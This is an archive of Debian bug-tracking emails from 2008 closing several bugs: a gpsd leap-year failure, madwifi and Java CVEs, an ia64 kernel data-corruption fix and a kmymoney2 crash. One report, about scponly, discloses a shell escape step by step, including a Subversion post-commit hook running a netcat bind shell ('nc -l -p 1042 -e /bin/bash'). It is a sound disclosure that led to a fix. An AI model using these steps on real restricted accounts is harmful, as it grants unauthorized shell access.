 fc9d62d80284dcb7501d4aa46d90705f 4556720 graphics optional 
mplayer_1.0~rc1-12etch2_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHrNDw9B/tjjP8QKQRAnaQAJ9CFXIMOOTzZm0l+Vze1HpOrRBVqACdG20v
UvBP/cfX6B7uk/aPAJA1Oko=
=k6y2
-END PGP SIGNATURE-


--- End Message ---


Bug#461855: marked as done ([Fwd: gpsd leap year bug in Debian stable])

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:08 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#461855: fixed in gpsd 2.33-4etch1
has caused the Debian Bug report #461855,
regarding [Fwd: gpsd leap year bug in Debian stable]
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
461855: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=461855
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: gpsd
Version: 2.33-4
Severity: serious
Submitter: [EMAIL PROTECTED]

 Original Message 
Subject: gpsd leap year bug in Debian stable
Date: Sun, 20 Jan 2008 13:06:44 +0100
From: Johan Swenker <[EMAIL PROTECTED]>
To: Bernd Zeimetz <[EMAIL PROTECTED]>

Hello Bernd,

I use gpsd to interface my Rockwell Jupiter TU30-D14 to NTP. New years day
just after 01:00 CET (thus 00:00 UTC) it stopped working.

Just today I found that it is not my hardware, but gpsd which is to blame.
Searching for the problem google directed me to
https://lists.berlios.de/pipermail/gpsd-dev/2008-January/005925.html ,
indicating a problem on new years day.
I downloaded gpsd-2.36, compiled it and ntp works again with my
gps-reciever.
But, ... I really hate it that I had to apt-get delete your gpsd-package.

Thus my request, can you package gpsd-2.36 for Debian stable (or backport
the leapyear fix).

Regards, Johan Swenker

-- 
Bernd Zeimetz
<[EMAIL PROTECTED]> 


--- End Message ---
--- Begin Message ---
Source: gpsd
Source-Version: 2.33-4etch1

We believe that the bug you reported is fixed in the latest version of
gpsd, which is due to be installed in the Debian FTP archive:

gpsd-clients_2.33-4etch1_i386.deb
  to pool/main/g/gpsd/gpsd-clients_2.33-4etch1_i386.deb
gpsd_2.33-4etch1.diff.gz
  to pool/main/g/gpsd/gpsd_2.33-4etch1.diff.gz
gpsd_2.33-4etch1.dsc
  to pool/main/g/gpsd/gpsd_2.33-4etch1.dsc
gpsd_2.33-4etch1_i386.deb
  to pool/main/g/gpsd/gpsd_2.33-4etch1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bernd Zeimetz <[EMAIL PROTECTED]> (supplier of updated gpsd package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Thu, 24 Jan 2008 11:53:45 +0100
Source: gpsd
Binary: gpsd gpsd-clients
Architecture: source i386
Version: 2.33-4etch1
Distribution: stable
Urgency: low
Maintainer: Bernd Zeimetz <[EMAIL PROTECTED]>
Changed-By: Bernd Zeimetz <[EMAIL PROTECTED]>
Description: 
 gpsd   - GPS (Global Positioning System) daemon
 gpsd-clients - clients for the GPS daemon
Closes: 461855
Changes: 
 gpsd (2.33-4etch1) stable; urgency=low
 .
   * debian/patches:
 - Adding 90_leap_year_bug.dpatch to fix a leap year bug which made gpsd
   stop working with the begin of 2008 (Closes: #461855).
   * debian/control:
 - Updating Maintainer entry to reflect the package adoption.
Files: 
 dc53a8ae0a389031d186585bc45635ba 775 misc optional gpsd_2.33-4etch1.dsc
 a7bcc9835d9f21355f46b9f7c76b15b0 64712 misc optional gpsd_2.33-4etch1.diff.gz
 b5941c76ca8cb353ea1093f54848f270 233594 misc optional gpsd_2.33-4etch1_i386.deb
 c1508202dbd0cc4d4da4414a65355755 78418 misc optional 
gpsd-clients_2.33-4etch1_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHmINRBnqtBMk7/3kRAr4gAKCfwlgGu7W80EfkFYjUVpuZsSsKmACfVfy8
Ze4/vGTDDwdU84A29pZMG2A=
=HUef
-END PGP SIGNATURE-


--- End Message ---


Bug#446824: marked as done (CVE-2007-5448 remote denial of service via crafted beacon frame)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:21 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#446824: fixed in madwifi 1:0.9.2+r1842.20061207-2etch2
has caused the Debian Bug report #446824,
regarding CVE-2007-5448 remote denial of service via crafted beacon frame
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
446824: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=446824
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: madwifi-source
Severity: grave
Tags: security patch

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for madwifi-source.

CVE-2007-5448[0]:
| Madwifi 0.9.3.2 and earlier allows remote attackers to cause a denial
| of service (panic) via a beacon frame with a large length value in the
| extended supported rates (xrates) element, which triggers an assertion
| error, related to net80211/ieee80211_scan_ap.c and
| net80211/ieee80211_scan_sta.c.

If you fix this vulnerability please also include the CVE id
in your changelog entry.

This is fixed in upstream svn on:
http://madwifi.org/changeset/2736

For further information:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5448

Kind regards
Nico

-- 
Nico Golde - http://ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpxRL3ej0n93.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---
Source: madwifi
Source-Version: 1:0.9.2+r1842.20061207-2etch2

We believe that the bug you reported is fixed in the latest version of
madwifi, which is due to be installed in the Debian FTP archive:

madwifi-doc_0.9.2+r1842.20061207-2etch2_all.deb
  to pool/non-free/m/madwifi/madwifi-doc_0.9.2+r1842.20061207-2etch2_all.deb
madwifi-source_0.9.2+r1842.20061207-2etch2_all.deb
  to pool/non-free/m/madwifi/madwifi-source_0.9.2+r1842.20061207-2etch2_all.deb
madwifi_0.9.2+r1842.20061207-2etch2.diff.gz
  to pool/non-free/m/madwifi/madwifi_0.9.2+r1842.20061207-2etch2.diff.gz
madwifi_0.9.2+r1842.20061207-2etch2.dsc
  to pool/non-free/m/madwifi/madwifi_0.9.2+r1842.20061207-2etch2.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Loic Minier <[EMAIL PROTECTED]> (supplier of updated madwifi package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sun, 30 Dec 2007 23:15:44 +0100
Source: madwifi
Binary: madwifi-doc madwifi-source
Architecture: source all
Version: 1:0.9.2+r1842.20061207-2etch2
Distribution: stable
Urgency: low
Maintainer: Debian madwifi team <[EMAIL PROTECTED]>
Changed-By: Loic Minier <[EMAIL PROTECTED]>
Description: 
 madwifi-doc - documentation for the Multiband Atheros Driver for WiFi
 madwifi-source - source for the Multiband Atheros Driver for WiFi
Closes: 446824
Changes: 
 madwifi (1:0.9.2+r1842.20061207-2etch2) stable; urgency=low
 .
   * Add 10_CVE-2007-5448_sanitize_xrates.dpatch from 1:0.9.3.2-2 to fix
 CVE-2007-5448:
 - DoS vulnerability via kassert from poor checking of xrate element in
   scan results (Closes: #446824)
Files: 
 1d5103a0fdbbe3284c0eee2be8721d09 831 non-free/net optional 
madwifi_0.9.2+r1842.20061207-2etch2.dsc
 e318f006bc29fb25b70e952fed4d9429 15509 non-free/net optional 
madwifi_0.9.2+r1842.20061207-2etch2.diff.gz
 42465bcbd432910d2da0ebe3c79209d6 3506650 non-free/net optional 
madwifi-source_0.9.2+r1842.20061207-2etch2_all.deb
 b393ecbf25f9e0d4203eedf372eabb6f 179052 non-free/doc optional 
madwifi-doc_0.9.2+r1842.20061207-2etch2_all.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHeBvp4VUX8isJIMARAkVBAJ9sHwYoyhwwsbH+/GigZl5TyOZkfQCgpRxp
WS3upl0qfIfWiS8LR/hz7MA=
=+d70
-END PGP SIGNATURE-


--- End Message ---


Bug#437148: marked as done ("svn", "svnserve", "unison", "rsync" passthrough is unsafe)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:28 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#437148: fixed in scponly 4.6-1etch1
has caused the Debian Bug report #437148,
regarding "svn", "svnserve", "unison", "rsync" passthrough is unsafe
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
437148: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=437148
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: scponly
Version: 4.6-1
X-Debbugs-CC: [EMAIL PROTECTED]
Severity: grave
Tags: security

Hi Thomas Wana,

messing around with some friends here, I tried to access his computer
with only a scponly protected account. I discovered this way of gaining
full shell access:

I locally created a subversion repository /tmp/blubb with
a /tmp/blubb/hooks/post-commit that contains the command:
( nc -l -p 1042 -e /bin/bash) &
I copy this repositry using
scp -r /tmp/blubb/ [EMAIL PROTECTED]:
Then I check out the repository remotely:
ssh [EMAIL PROTECTED] /usr/bin/svn co file:///home/user/blubb bla
Now I add a file and commit it:
touch blah
scp blah [EMAIL PROTECTED]:bla/
ssh [EMAIL PROTECTED] /usr/bin/svn ci bla
At this point, I have a vim instance running, asking me for the commit
message. I could now just run
:!/bin/bash
to get a shell, but having done the post-commit hook already, I want to
use that, so I write something and quit the editor with :x

At this point, I can use
nc host 1042
and I have a shell for the account that should have none.

The solution would be: Do not enable access to svn
(or svnserve), which is a simple compilation option. I’d appreciate it
if this gets fixed in debian etch.

I have sent this information to [EMAIL PROTECTED] and scponly’s
upstream maintainer last week, but have not yet gotten a response.

Greetings,
Joachim


-- 
Joachim "nomeata" Breitner
Debian Developer
  [EMAIL PROTECTED] | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: [EMAIL PROTECTED] | http://people.debian.org/~nomeata



signature.asc
Description: Dies ist ein digital signierter Nachrichtenteil
--- End Message ---
--- Begin Message ---
Source: scponly
Source-Version: 4.6-1etch1

We believe that the bug you reported is fixed in the latest version of
scponly, which is due to be installed in the Debian FTP archive:

scponly_4.6-1etch1.diff.gz
  to pool/main/s/scponly/scponly_4.6-1etch1.diff.gz
scponly_4.6-1etch1.dsc
  to pool/main/s/scponly/scponly_4.6-1etch1.dsc
scponly_4.6-1etch1_amd64.deb
  to pool/main/s/scponly/scponly_4.6-1etch1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Florian Weimer <[EMAIL PROTECTED]> (supplier of updated scponly package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Tue, 25 Dec 2007 14:11:00 +0100
Source: scponly
Binary: scponly
Architecture: source amd64
Version: 4.6-1etch1
Distribution: stable-security
Urgency: high
Maintainer: Thomas Wana <[EMAIL PROTECTED]>
Changed-By: Florian Weimer <[EMAIL PROTECTED]>
Description: 
 scponly- Restricts the commands available to scp- and sftp-users
Closes: 437148
Changes: 
 scponly (4.6-1etch1) stable-security; urgency=high
 .
   * Non-maintainer upload by the Security Team
   * Remove rsync, Subversion and Unison support because it was possible
 to gain shell access through them (CVE-2007-6350).  Closes: #437148.
   * scp: -o and -F options are dangerous (CVE-2007-6415).
Files: 
 c02dfefb7289fcb09e9ac83d7cf78655 890 utils optional scponly_4.6-1etch1.dsc
 0425cb868cadd026851238452f1db907 96578 utils optional scponly_4.6.orig.tar.gz
 a588cb9138820d73f16bc81ffc4f8e20 28528 utils optional 
scponly_4.6-1etch1.diff.gz
 2bb425113107e4e471c15685333f1a0a 34214 utils optional 
scponly_4.6-1etch1_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBR3EI5797/wQC1SS+AQLsYAf9FvSLLurAKk42qCXJgjysHinC0iLsKpZp
aTVAxPCInbqg7IwX5Rf28gXogQ3OROStMZfduyjxaRXUxnLkgD+pTS/aYKbIueEo
LvL2bhHJFyQQuxqZ3wOBLvHndRWAwdsuNWxnpQPDgxWVDzw3jVINp50bk25aVMV8
OMkNxhcJUWjhr71TRv7A1aNfn70z8lnZGTjyBMkqr9MEqiJ2vYr7TPbyhONBqmad
8g6IJj1oJ3aq5wRuoZ88Klwze6kWXfb7TdN6I4grDVZ8JRoBb/AhX5tyXVHo5mZ1
N

Bug#230358: marked as done (RM: ipxripd/stable -- RoSRM; only works with 2.4 kernels)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:45:23 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#230358: fixed
has caused the Debian Bug report #230358,
regarding RM: ipxripd/stable -- RoSRM; only works with 2.4 kernels
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
230358: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=230358
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: ipxripd
Version: 0.7-13.1
Severity: important

*** Please type your report below this line ***

When ipxd is run on this machine running Linux 2.6.1, it exits
immediately, without adding any routes.

The IPX files in /proc have moved from /proc/net to /proc/net/ipx, and the
'ipx_' prefix has been dropped. I guess this is a change in Linux 2.6 from
2.4.

By editing the ipxd binary and replacing '_' with '/' in the strings
'/proc/net/ipx_route', '/proc/net/ipx_interface' etc., I produced a binary
which appears to work: the routes appear in /proc/net/ipx/route and
'slist' produces the expected list of servers on a machine on the
cnonected network.

Kind regards,

Rob.

-- System Information:
Debian Release: testing/unstable
Architecture: i386
Kernel: Linux black 2.6.1 #1 Wed Jan 28 17:14:07 GMT 2004 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages ipxripd depends on:
ii  libc6   2.3.2.ds1-10 GNU C Library: Shared
libraries an

-- no debconf information


Robert Adamson
IT Manager, Fitzwilliam College, Cambridge
http://www.fitz.cam.ac.uk/college/computing/

--- End Message ---
--- Begin Message ---
We believe that the bug you reported is now fixed; the following
package(s) have been removed from stable:

   ipxripd |   0.7-13.1 | source, alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390, sparc

Note that the package(s) have simply been removed from the tag
database and may (or may not) still be in the pool; this is not a bug.
The package(s) will be physically removed automatically when no suite
references them (and in the case of source, when no binary references
it).  Please also remember that the changes have been done on the
master archive (ftp-master.debian.org) and will not propagate to any
mirrors (ftp.debian.org included) until the next cron.daily run at the
earliest.

Packages are never removed from testing by hand.  Testing tracks
unstable and will automatically remove packages which were removed
from unstable when removing them from testing causes no dependency
problems.

Bugs which have been reported against this package are not automatically
removed from the Bug Tracking System.  Please check all open bugs and
close them or re-assign them to another package if the removed package
was superseded by another one.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED]

This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
[EMAIL PROTECTED]

Debian distribution maintenance software
pp.
Archive Administrator (the ftpmaster behind the curtain)

--- End Message ---


Bug#463501: marked as done (allows unauthorized remote arbitrary code execution (CVE-2007-5689))

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:29 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#463501: fixed in sun-java5 1.5.0-14-1etch1
has caused the Debian Bug report #463501,
regarding allows unauthorized remote arbitrary code execution (CVE-2007-5689)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
463501: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=463501
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: sun-java5
Version: 1.5.0-10-3
Severity: critical
Tags: security, fixed-upstream

1.5.0-10 is vulnerable to CVE-2007-5689 :
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5689

From http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5689 :

Overview

 The Java Virtual Machine (JVM) in Sun Java Runtime Environment (JRE) in SDK 
and JRE 1.3.x through 1.3.1_20 and 1.4.x through 1.4.2_15, and JDK and JRE 
5.x through 5.0 Update 12 and 6.x through 6 Update 2, allows remote attackers 
to execute arbitrary programs, or read or modify arbitrary files, via applets 
that grant privileges to themselves. 
 
Impact

 CVSS Severity (version 2.0):
 CVSS v2 Base score: 10.0 (High) (AV:N/AC:L/Au:N/C:C/I:C/A:C) (legend) 
 Impact Subscore: 10.0
 Exploitability Subscore: 10.0 


--- End Message ---
--- Begin Message ---
Source: sun-java5
Source-Version: 1.5.0-14-1etch1

We believe that the bug you reported is fixed in the latest version of
sun-java5, which is due to be installed in the Debian FTP archive:

ia32-sun-java5-bin_1.5.0-14-1etch1_amd64.deb
  to pool/non-free/s/sun-java5/ia32-sun-java5-bin_1.5.0-14-1etch1_amd64.deb
ia32-sun-java5-bin_1.5.0-14-1etch1_ia64.deb
  to pool/non-free/s/sun-java5/ia32-sun-java5-bin_1.5.0-14-1etch1_ia64.deb
sun-java5-bin_1.5.0-14-1etch1_amd64.deb
  to pool/non-free/s/sun-java5/sun-java5-bin_1.5.0-14-1etch1_amd64.deb
sun-java5-bin_1.5.0-14-1etch1_i386.deb
  to pool/non-free/s/sun-java5/sun-java5-bin_1.5.0-14-1etch1_i386.deb
sun-java5-demo_1.5.0-14-1etch1_amd64.deb
  to pool/non-free/s/sun-java5/sun-java5-demo_1.5.0-14-1etch1_amd64.deb
sun-java5-demo_1.5.0-14-1etch1_i386.deb
  to pool/non-free/s/sun-java5/sun-java5-demo_1.5.0-14-1etch1_i386.deb
sun-java5-doc_1.5.0-14-1etch1_all.deb
  to pool/non-free/s/sun-java5/sun-java5-doc_1.5.0-14-1etch1_all.deb
sun-java5-fonts_1.5.0-14-1etch1_all.deb
  to pool/non-free/s/sun-java5/sun-java5-fonts_1.5.0-14-1etch1_all.deb
sun-java5-jdk_1.5.0-14-1etch1_amd64.deb
  to pool/non-free/s/sun-java5/sun-java5-jdk_1.5.0-14-1etch1_amd64.deb
sun-java5-jdk_1.5.0-14-1etch1_i386.deb
  to pool/non-free/s/sun-java5/sun-java5-jdk_1.5.0-14-1etch1_i386.deb
sun-java5-jre_1.5.0-14-1etch1_all.deb
  to pool/non-free/s/sun-java5/sun-java5-jre_1.5.0-14-1etch1_all.deb
sun-java5-plugin_1.5.0-14-1etch1_i386.deb
  to pool/non-free/s/sun-java5/sun-java5-plugin_1.5.0-14-1etch1_i386.deb
sun-java5-source_1.5.0-14-1etch1_all.deb
  to pool/non-free/s/sun-java5/sun-java5-source_1.5.0-14-1etch1_all.deb
sun-java5_1.5.0-14-1etch1.diff.gz
  to pool/non-free/s/sun-java5/sun-java5_1.5.0-14-1etch1.diff.gz
sun-java5_1.5.0-14-1etch1.dsc
  to pool/non-free/s/sun-java5/sun-java5_1.5.0-14-1etch1.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Matthias Klose <[EMAIL PROTECTED]> (supplier of updated sun-java5 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Fri, 01 Feb 2008 07:41:34 +0100
Source: sun-java5
Binary: sun-java5-demo sun-java5-fonts sun-java5-bin sun-java5-source 
sun-java5-jdk sun-java5-doc sun-java5-jre ia32-sun-java5-plugin 
ia32-sun-java5-bin sun-java5-plugin
Architecture: all amd64 i386 ia64 source 
Version: 1.5.0-14-1etch1
Distribution: stable
Urgency: low
Maintainer: Matthias Klose <[EMAIL PROTECTED]>
Changed-By: Matthias Klose <[EMAIL PROTECTED]>
Description: 
 ia32-sun-java5-bin - Sun Java(TM) Runtime Environment (JRE) 5.0 (32-bit)
 sun-java5-bin - Sun Java(TM) Runtime Environment (JRE) 5.0 (architecture 
dependen
 sun-java5-demo - Sun Java(TM) Development Kit (JDK) 5.0 demos and examples
 sun-java5-jdk - Sun Java(TM) Development Kit (JDK) 5.0
Closes: 463501
Changes: 
 sun-java5 (1.5.0-14-1etch1) stable; urgency=low
 .
   * Upload to etch-updates.
   * New upstre

Bug#461493: marked as done (linux-2.6: [ia64] FP instructions/misaligned access cause silent user data corruption)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:32 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#461493: fixed in user-mode-linux 2.6.18-1um-2etch.18etch1
has caused the Debian Bug report #461493,
regarding linux-2.6: [ia64] FP instructions/misaligned access cause silent user 
data corruption
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
461493: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=461493
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: linux-2.6
Version: 2.6.18.dfsg.1-17
Severity: critical
Tags: patch
Justification: causes serious data loss

References:
  
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=1a499150e4ec1299232e24389f648d059ce5617a
  https://bugzilla.redhat.com/show_bug.cgi?id=428920
  https://bugzilla.novell.com/show_bug.cgi?id=354069

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: ia64

Kernel: Linux 2.6.22-3-mckinley (SMP w/1 CPU core)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash


--- End Message ---
--- Begin Message ---
Source: user-mode-linux
Source-Version: 2.6.18-1um-2etch.18etch1

We believe that the bug you reported is fixed in the latest version of
user-mode-linux, which is due to be installed in the Debian FTP archive:

user-mode-linux_2.6.18-1um-2etch.18etch1.diff.gz
  to 
pool/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch1.diff.gz
user-mode-linux_2.6.18-1um-2etch.18etch1.dsc
  to pool/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch1.dsc
user-mode-linux_2.6.18-1um-2etch.18etch1_i386.deb
  to 
pool/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
dann frazier <[EMAIL PROTECTED]> (supplier of updated user-mode-linux package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Tue, 12 Feb 2008 09:57:25 -0700
Source: user-mode-linux
Binary: user-mode-linux
Architecture: source i386
Version: 2.6.18-1um-2etch.18etch1
Distribution: stable-security
Urgency: high
Maintainer: User Mode Linux Maintainers <[EMAIL PROTECTED]>
Changed-By: dann frazier <[EMAIL PROTECTED]>
Description: 
 user-mode-linux - User-mode Linux (kernel)
Closes: 460337 461493
Changes: 
 user-mode-linux (2.6.18-1um-2etch.18etch1) stable-security; urgency=high
 .
   * Rebuild against linux-source-2.6.18 (2.6.18.dfsg.1-18etch1)
 * bugfix/vmsplice-security.patch
   [SECURITY] Fix missing access check in vmsplice.
   See CVE-2008-0010, CVE-2008-0600
 * bugfix/all/vserver/proc-link-security.patch
   [SECURITY][vserver] Fix access checks for the links in /proc/$pid.
   * Changes from linux-source-2.6.18 (2.6.18.dfsg.1-18)
 [ Martin Michlmayr ]
 * [mips] Fix network on Cobalt RaQ1, thanks Thomas Bogendoerfer
   (closes: #460337).
 .
 [ dann frazier ]
 * [ia64] Fix an issue with unaligned accesses and certain floating point
   instructions that can result in silent user data corruption
   (closes: #461493).
 * Update abi reference files for ABI 6
Files: 
 a316e3449f9cd0bbf497ad704c1d78ec 892 misc extra 
user-mode-linux_2.6.18-1um-2etch.18etch1.dsc
 b62c78f80dbe59c81827b4d7cf1c3997 16048 misc extra 
user-mode-linux_2.6.18-1um-2etch.18etch1.diff.gz
 1d2290c410d6d56c0e698f217ddb1dc6 25585940 misc extra 
user-mode-linux_2.6.18-1um-2etch.18etch1_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHsgQJhuANDBmkLRkRApscAKCJNCn9DnLiOPi8SLIrW8REOafUVACgkt7P
ncqNS55G+rHbBayQAA7ts68=
=4zjq
-END PGP SIGNATURE-


--- End Message ---


Bug#457412: marked as done (Applications (like kmymoney2) segfault without installed libchipcard2-data)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:12 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#457412: fixed in libchipcard2 2.1.9-3
has caused the Debian Bug report #457412,
regarding Applications (like kmymoney2) segfault without installed 
libchipcard2-data
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
457412: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=457412
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: kmymoney2
Version: 0.8.7-2
Severity: normal

Hi,

during configuration of the online-banking feature of kmymoney2, when
choosing to import user data from chipcard and clicking on "OK",
kmymoney2 crashes and produces a backtrace.
Only when started from the command-line it produces an understandable
error-message which says that libchipcard is missing it's configuration
file. Thus, after installing e.g. libchipcard2-data, it works.

I consider this a bug, because kmymoney2 and libchipcard2 both seemingly
don't depend on the abovementioned "-data" package, and there also is no
proper error/indication message explaining the user to install that
package.

Please consider those "normal" (e.g. migrated Windows-) users who aren't
used to changing to the command-line or compiling packages themselves.
The current behaviour (silent program-crash) is a big "turn-off" in
those cases..



-- System Information:
Debian Release: lenny/sid
  APT prefers gutsy-updates
  APT policy: (500, 'gutsy-updates'), (500, 'gutsy-security'), (500,
'gutsy-proposed'), (500, 'gutsy-backports'), (500, 'gutsy')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.24-rc5-ua64 (SMP w/2 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages kmymoney2 depends on:
ii  kdelibs4c 4:3.5.8-0ubuntu3.2 core libraries and binaries
for al
ii  libacl1   2.2.42-1ubuntu1Access control list shared
library
ii  libaqbank 2.2.3-4library for online banking
applica
ii  libart-2. 2.3.19-3   Library of functions for 2D
graphi
ii  libattr1  1:2.4.32-1.1ubuntu1Extended attribute shared
library
ii  libaudio2 1.9-2  The Network Audio System
(NAS). (s
ii  libc6 2.6.1-1ubuntu10GNU C Library: Shared libraries
ii  libfontco 2.4.2-1.2ubuntu4   generic font configuration
library
ii  libfreety 2.3.5-1ubuntu4 FreeType 2 font engine,
shared lib
ii  libgcc1   1:4.2.1-5ubuntu4   GCC support library
ii  libgwenhy 2.5.4-2OS abstraction layer
ii  libice6   2:1.0.3-3  X11 Inter-Client Exchange
library
ii  libidn11  1.0-0  GNU libidn library,
implementation
ii  libjpeg62 6b-14  The Independent JPEG
Group's JPEG
ii  libkbanki 2.2.3-4KDE frontend library for
AqBanking
ii  libofx3   1:0.8.2-3ubuntu2   library to support Open
Financial
ii  libosp5   1.5.2-3ubuntu3 Runtime library for
